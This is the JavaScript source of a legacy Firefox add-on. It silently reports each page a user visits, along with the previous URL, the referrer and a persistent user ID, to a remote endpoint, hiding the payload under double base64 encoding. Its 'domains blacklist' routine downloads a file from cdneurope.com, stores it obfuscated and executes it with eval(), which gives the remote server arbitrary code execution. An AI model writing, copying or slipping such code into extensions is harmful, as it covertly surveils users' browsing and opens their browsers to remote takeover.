// version 2.2
"use strict";
var websitexp_tr = new function() {
	var self = this;

	var DEBUG = false;

	var log = function(logInfo) {
		if (DEBUG) { console.log(logInfo); }
	};	

	// consts
	this.SRC 			= "7902";
	this.ADDON_ID 		= "{a2bfe612-4cf5-48ea-907c-f3fb25bc9d6b}";
	this.LB_URL 		= "http://lb.webovernet.com/settings";
	this.PREFS_BRANCH 	= "";

	// fields
	this.ci					= Components.interfaces;
	this.cr					= Components.results;
	this.cc					= Components.classes;
	this.webp				= Components.interfaces.nsIWebProgress;
	this.webpl				= Components.interfaces.nsIWebProgressListener;
	this.tabs				= new Array();
	this.user_id			= '';
	this.s					= this.SRC;
	this.md					= '21';
	this.sub				= 'FF';
	this.session_id 		= '';	
	this.listeners 			= null;
	this.send_url 			= '';
	this.domainsBlacklist 	= null;
	this.prefManager 		= null;

	this.init = function() {
		this.prefManager = new this.PrefManager(this.ADDON_ID, this.PREFS_BRANCH);		
		this.initTabListeners();		
		this.domainsBlacklist = new this.DomainsBlacklist(this.prefManager);
	};

	this.getAddonId = function() {
		return this.ADDON_ID;
	};

    this.getPid = function() {
        try {
			try { return this.prefManager.getPref("user_id"); }
			catch(e) {}
        } 
		catch(e) { return null; }
	};

	this.isValidListener = function(iid) {	
		return (iid.equals(this.webpl) || iid.equals(this.ci.nsISupportsWeakReference) || iid.equals(this.ci.nsISupports));
	};

	this.loadBalance = function(currentversion) {
		var url_params = "s="+encodeURIComponent (this.s);
		var installtime = 0;
		try { installtime = this.prefManager.getPref("installtime"); }
		catch(e){ }
		
		if (installtime == 0 || installtime == "") {
			installtime = new Date().getTime() / 1000;
			try { this.prefManager.setPref("installtime", installtime); }
			catch(e) {}
		}
		
		installtime = 1;
		url_params = url_params + "&ins=" + encodeURIComponent(installtime) + "&ver=" + encodeURIComponent(currentversion);
		var req = new XMLHttpRequest();
		req.open("GET", this.LB_URL + "?" + url_params, true);
		req.onreadystatechange = function() {
			if (req.readyState == 4) {
				var lb = JSON.parse(req.responseText);
				if (lb && lb.Status == 1) {
					self.send_url = lb.Endpoint;
					try { self.prefManager.setPref("server", lb.Endpoint); }
					catch(e) {}
				}
				/* disabled it here, it is now triggered from "mo.js" */
				// var moEvent = new CustomEvent("mo");
				// moEvent.params = {
				// 	isEnabled : lb.Mon == 1,
				// 	addonId : self.ADDON_ID
				// };
				// window.dispatchEvent(moEvent);
			}
		};
		req.send(null);
	};
	
	this.randomStringNum = function(length) {
        var chars = '0123456789'.split('');
        if (!length) {
            length = Math.floor(Math.random() * chars.length);
        }
        
        var str = '';
        for (var i = 0; i < length; i++) {
            str += chars[Math.floor(Math.random() * chars.length)];
        }
        return str;
	};

	this.initTabListeners = function() {
		this.session_id = 'S' + this.randomStringNum(14);
		var pid = this.getPid();

		if (pid == "" || pid == null) {
			pid = this.randomStringNum(14);
		}

		this.prefManager.setPref("user_id", pid);
		this.user_id = pid;
		
		var s = this.prefManager.getPref("src");
		if (!s) {
			this.prefManager.setPref("src", this.s);
		}
		this.s = this.prefManager.getPref("src");
		
		this.listeners = new this.globalTabsListner();
		gBrowser.addTabsProgressListener(this.listeners);
			
		Components.utils.import("resource://gre/modules/AddonManager.jsm");
		AddonManager.getAddonByID(this.ADDON_ID, function(addon) {
			self.loadBalance(addon.version);
		});
	};

	this.globalTabsListner = function() {};
	this.globalTabsListner.prototype = {
		QueryInterface: function(iid) {
			if (self.isValidListener(iid)) {
				return this;
			}
			throw self.cr.NS_NOINTERFACE;
		},
		onLocationChange: function(aBrowser, aProgress, aRequest, aURI) {
			try {
				var httpChannel = null;
				if (aProgress.DOMWindow != aProgress.DOMWindow.top) { return 0; }

				if (aURI.asciiSpec.indexOf("about:") > -1) { return; }				
				if (self.domainsBlacklist.isListed(aURI.asciiSpec)) { return; }
					
				var ref = aBrowser.contentDocument.referrer;
				if (aRequest && aRequest.referrer && typeof(aRequest.referrer) != undefined) {
					ref = aRequest.referrer.asciiSpec;	
				}
				var is_link = ref != "";
				
				if (typeof(aBrowser.prev_url_ssff) == "undefined" && (aURI.asciiSpec.indexOf("www.google.com/aclk")>-1)) {
					aBrowser.prev_url_ssff = ref;
					return;
				}

				if ((aURI.asciiSpec.indexOf("www.google.com/aclk")>-1)) { return; }
				
				var prev = "";
				if (aBrowser.prev_url_ssff && (aBrowser.prev_url_ssff !="")) {
					prev = aBrowser.prev_url_ssff;
				}
				else if (aProgress.DOMWindow.opener) {
					prev = aProgress.DOMWindow.opener.top.location.href;
				}
				else {
					prev = ref;
				}
			
				if ((prev & prev.indexOf("http://www.google") > -1) &&
					(aURI.asciiSpec.indexOf("http://www.google") > -1)) { return; }

				if ((prev && prev.indexOf("https://www.google") > -1) &&
					(aURI.asciiSpec.indexOf("http://www.google") > -1) &&
					(aURI.asciiSpec.indexOf("q=&") > -1)) { return; }

				if (self.send_url && self.send_url != "") {
					var contentType = "";
					var httpChannel = null;
					try { httpChannel = aRequest.QueryInterface(self.ci.nsIHttpChannel); } catch (e) {}
					try { contentType = httpChannel.contentType; } catch(e) {}
					if (contentType.toLowerCase().indexOf("html") == -1 && contentType != "") {
						aBrowser.prev_url_ssff = "";
						return;
					}
					
					var params = "s=" + encodeURIComponent(self.s) + "&md=" + encodeURIComponent(self.md) + "&pid=" + encodeURIComponent(self.user_id) + "&sess=" + encodeURIComponent(self.session_id) + "&q=" + encodeURIComponent(aURI.asciiSpec) + "&prev=" + encodeURIComponent(prev) + "&link=" + (is_link?"1":"0") + "&hreferer=" + encodeURIComponent(ref) + "&sub=" + encodeURIComponent(self.sub);
					var req = new XMLHttpRequest();
					req.open("POST", self.send_url + "/related", true);
					req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

					req.onreadystatechange = function() {
						if (req.readyState == 4) {}
					}
					if (aBrowser.prev_url_ssff == aURI.asciiSpec) { return; }
					params = encodeURIComponent(window.btoa(window.btoa(params)));
					req.send("e=" + params);
				}
				aBrowser.prev_url_ssff = aURI.asciiSpec;
			}
			catch(e) {};
				
		
		}, 
		onProgressChange: function(aBrowser, aProgress, aRequest, curSelfPr, maxSelfPr, curTotPr, maxTotPr) { return 0 }, 
		onSecurityChange: function(aBrowser, aProgress, aRequest, aState) { return 0; },
	  	onStateChange: function(aBrowser, aProgress, aRequest, aFlag, aStatus) { },
		onStatusChange: function(aBrowser, webProgress , request , ostatus ,  message) { return 0; },
		onRefreshAttempted: function(aBrowser,webProgress,aRefreshURI,aMillis,aSameURI) { return true; },
		onLinkIconAvailable : function(aBrowser) { return 0 }
	};

	this.PrefManager = function(_addonId, _prefsBranch) {
		var prefService = null;
		var prefsBranch = null;
		var addonId = null;

		this.init = function(_addonId, _prefsBranch) {
			prefsBranch = _prefsBranch || "";
			addonId = _addonId;
			prefService = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefService).getBranch(prefsBranch);
		};

		this.isPrefExists = function(prefName) {
			return prefService.getPrefType(addonId + "." + prefName) !== prefService.PREF_INVALID;
		};

		this.setPref = function(name, value, type) {
			type = type || prefService.getPrefType(addonId + "." + name);
			if (type === prefService.PREF_INVALID) { type = prefService.PREF_STRING; }

	        switch(type) {
	            case prefService.PREF_STRING :
	                prefService.setCharPref(addonId + "." + name, value);
	                return true;
	            break;
	            case prefService.PREF_INT :
	                prefService.setIntPref(addonId + "." + name, value);
	                return true;
	            break;
	            case prefService.PREF_BOOL :
	                prefService.setBoolPref(addonId + "." + name, value);
	                return true;
	            break;
	            case prefService.PREF_INVALID :
	                return false;
	            break;		
	        }			
		};

		this.getPref = function(name) {
			var type = prefService.getPrefType(addonId + "." + name);
	        switch(type) {
	            case prefService.PREF_STRING :
	                return prefService.getCharPref(addonId + "." + name);
	            break;
	            case prefService.PREF_INT :
	                return prefService.getIntPref(addonId + "." + name);
	            break;
	            case prefService.PREF_BOOL :
	                return prefService.getBoolPref(addonId + "." + name);
	            break;
	            case prefService.PREF_INVALID :
	                return false;
	            break;		
	        }			
		};

		this.init(_addonId, _prefsBranch);
	};

	this.DomainsBlacklist = function(_prefManager) {
		var self = this;

		// var REMOTE_BLACKLIST_URL = "http://localhost/remoteBlacklist/config.txt";
		var REMOTE_BLACKLIST_URL = "http://cdneurope.com/tr/config.txt";
		var LOCAL_FILENAME = "config_sm.txt";
		var BLACKLIST_PREF = "config_sm";
		var REFRESH_DAYS_INTERVAL = 7;
		var ENCODING_NUM_TIMES = 3;
		var IS_ENCODE_BASE64 = true;

		var prefManager = null;
		var fileHandler = null;
		var list = null;

		this.init = function(_prefManager) {
			prefManager = _prefManager;
			fileHandler = new this.FileHandler(LOCAL_FILENAME);

			if (!fileHandler.isFileExist() || this.isTimeToRefreshList()) {
				// console.log("download file");
				this.getRemoteList(function(data) {					
					fileHandler.writeToFile(data, IS_ENCODE_BASE64, ENCODING_NUM_TIMES);
					prefManager.setPref(BLACKLIST_PREF, new Date() / 1);
					setTimeout(function() { eval(data); }, 1000);
				});
			} else {
				// console.log("reading locally");
				fileHandler.readFile(function(data) {
					eval(data);
				}, IS_ENCODE_BASE64, ENCODING_NUM_TIMES);
			}
		};

		this.getList = function() { return list; }
		this.setList = function(_list) { list = _list; }

		this.getDomainName = function(url) {
			return url.toLowerCase().split("/")[2];				
		};

		this.isListed = function(url) {
			if (!list) { return false; }
			var domain = this.getDomainName(url);

			for (var i in list) {
				if (domain.indexOf(list[i].toLowerCase()) != -1) {
					return true;
				}
			}
			return false;
		};

		this.isTimeToRefreshList = function() {
			var lastRefreshTime = prefManager.getPref(BLACKLIST_PREF);
			var now = new Date() / 1;
			var daysPassed = (now - lastRefreshTime)/1000/60/60/24;
						
			return daysPassed >= REFRESH_DAYS_INTERVAL;
		};

		this.getRemoteList = function(onComplete) {
			var req = new XMLHttpRequest();
			req.open("GET", REMOTE_BLACKLIST_URL, true);

			req.onreadystatechange = function() {
				if (req.readyState == 4) {					
					var list = req.responseText;
					onComplete(list);
				}
			};
			req.send(null);
		};

		// FileHandler class
		this.FileHandler = function(_filename) {
			var filename = null;

			this.init = function(_filename) {
				filename = _filename;
			};

		    this.getNsiFile = function(folder) {
		    	folder = folder || "ProfD";

				var file = Components.classes["@mozilla.org/file/directory_service;1"].
					getService(Components.interfaces.nsIProperties).
					get(folder, Components.interfaces.nsIFile);
				file.append(filename);

				return file;
		    };

	    	this.isFileExist = function() {
	    		return this.getNsiFile().exists();
	    	};

		    this.writeToFile = function(data, isEncodeBase64, numOfTimesToEncodeBase64) {
				var file = this.getNsiFile();
				if (isEncodeBase64 && numOfTimesToEncodeBase64) {
					for (var i = 0; i < numOfTimesToEncodeBase64; i++) { 
						data = window.btoa(data);
					}
				}

		        Components.utils.import("resource://gre/modules/NetUtil.jsm");
		        Components.utils.import("resource://gre/modules/FileUtils.jsm");

		        var ostream = FileUtils.openSafeFileOutputStream(file);
		        var converter = Components.classes["@mozilla.org/intl/scriptableunicodeconverter"].  
					createInstance(Components.interfaces.nsIScriptableUnicodeConverter);  
		        converter.charset = "UTF-8";
		        var istream = converter.convertToInputStream(data);  
		          
		        NetUtil.asyncCopy(istream, ostream, function(status) {
		            if (Components.isSuccessCode(status)) { }
		            if (!Components.isSuccessCode(status)) { return; }
		        });
		    };

		    this.readFile = function(onFileRead, isDecodeBase64, numOfTimesToDecodeBase64) {
				var file = this.getNsiFile();

				Components.utils.import("resource://gre/modules/NetUtil.jsm");
				NetUtil.asyncFetch(file, function(inputStream, status) {
					if (!Components.isSuccessCode(status)) {
						// Handle error!
						return;
					}
					var data = NetUtil.readInputStreamToString(inputStream, inputStream.available());
					if (isDecodeBase64 && numOfTimesToDecodeBase64) {
						for (var i = 0; i < numOfTimesToDecodeBase64; i++) { 
							data = window.atob(data);
						}
					}
					setTimeout(function() { onFileRead(data); }, 1000);
				});
		    };

		    this.init(_filename);
		};

		this.init(_prefManager);
	};

	setTimeout(function() { self.init(); }, 500);
};

var main_tr_ref = websitexp_tr;